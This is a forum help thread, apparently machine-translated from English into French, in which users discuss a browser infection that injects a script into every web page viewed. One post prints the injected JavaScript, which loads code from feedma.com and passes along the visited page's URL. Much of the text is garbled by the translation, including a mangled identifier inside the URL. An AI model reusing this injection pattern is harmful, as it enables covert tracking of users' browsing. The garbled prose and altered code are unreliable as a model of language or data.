13 objets trouvés après 12 minutes de la numérisation. Should have got a mac.
J'adore quand les gens prennent des commentaires de ce genre, je trouve ça hilarant. J'ai couru pas un anti-virus, anti-malware, anti-n'importe quoi sur n'importe lequel de mes ordinateurs à domicile au cours des années et je n'ai pas attrapé un virus ou quoi que ce soit malveillant pendant ce temps. Je ne exécutez un pare-feu matériel though. J'ai aussi deux jeunes utiliser ces PC et de rien. Les gens aiment à pointer du doigt Microsoft et disent que c'est leur faute, mais elle n'est pas. La plupart du temps c'est votre faute, vous avez un virus. Vous avez cliqué sur quelque chose que tu n'aurais pas dû, vous avez ouvert une pièce jointe vous ne devriez pas avoir, ou que ce soit. En bout de ligne, vous avez fait quelque chose de pas Microsoft.
Pêche à la traîne modérée est réussie. gif "alt =": P "title =" Razz ">
Im bien consciente que ses ma faute, ce qui s'est passé, Im just kidding. Bien que je ne macs respect de certaines de leurs caractéristiques (conception de l'interface notamment).
NoScript pour Firefox, Nice. Comment est-ce que vous aider autant que IE ou la chose vous avez probablement en cours d'exécution en arrière-plan la recherche de mises à jour méchant?
Ce que je veux savoir, c'est comment est cette chose faire apparaître cette ligne dans le source HTML que vous voyez?
Etes-vous sûr que vous n'allez pas à travers un proxy thats ajoutant ou quoi?
Je pense que si somethings détournement de la page inbetween le temps qu'il arrive à votre ordinateur, pour le moment il est stocké dans le cache HTML et affiché, les navigateurs, tout serait affectée. gif "alt =": scratchhead: "title =" #Scratch Head ">
IE ne fonctionne pas, et il n'y a pas de processus en cours que je ne sais pas exactement ce qu'ils font. (J'aime bien faire fonctionner un navire serré - pas de services d'appoint ou de processus de démarrage / que nécessaire)
Thats ce que je pensais aussi, mais il ne s'est certainement pas dans Safari ou Chrome. Son étrange. Pas de proxy.
Le virus est d'insérer cet extrait dans l'ensemble des sites qu'il vues.
Ouais vous avez raison. Don Désolé si je n'était pas claire.
Saviez télécharger n'importe qui
http://feedma.com/cgi-bin/cont/cont.cgi?uuid= (5809AA41-8B64-4074-8 fév-32FD41BC1113)?
On obtient:
if(top == self)
{
document.write('<script type="text/javascript" src="http://feedma.com/cgi-bin/cont/contt.cgi?&uuid={5809AA41-8B64-4074-8FEB-32FD41BC1113}&ref='+top.location+'" charset="utf-8"></script>');
}
//
- if(top == self)
- {
- document.write('<script type="text/javascript" src="http://feedma.com/cgi-bin/cont/contt.cgi?&uuid={5809AA41-8B64-4074-8FEB-32FD41BC1113}&ref='+top.location+'" charset="utf-8"></script>');
- }
- //
Whats up with that?
Si sa le cadre du haut, ajouter ce script à nouveau? Wouldnt il boucle? Je ne sais pas. Je pense qu'il ya probablement plus de suivi que les annonces ou quelque chose de malicieux. N'hésitez pas à me corriger si Im tort.
De bonnes nouvelles même si - je suis parti quelques scanners hier soir, et il se passe plus rien. Had to restart pour supprimer / réparer une DLL, je crois que c'était probablement lui. Est-ce que quelqu'un sait d'une DLL que IE et FF partager? Je voudrais savoir plus sur ce genre de chose.
Mais merci pour toutes les réponses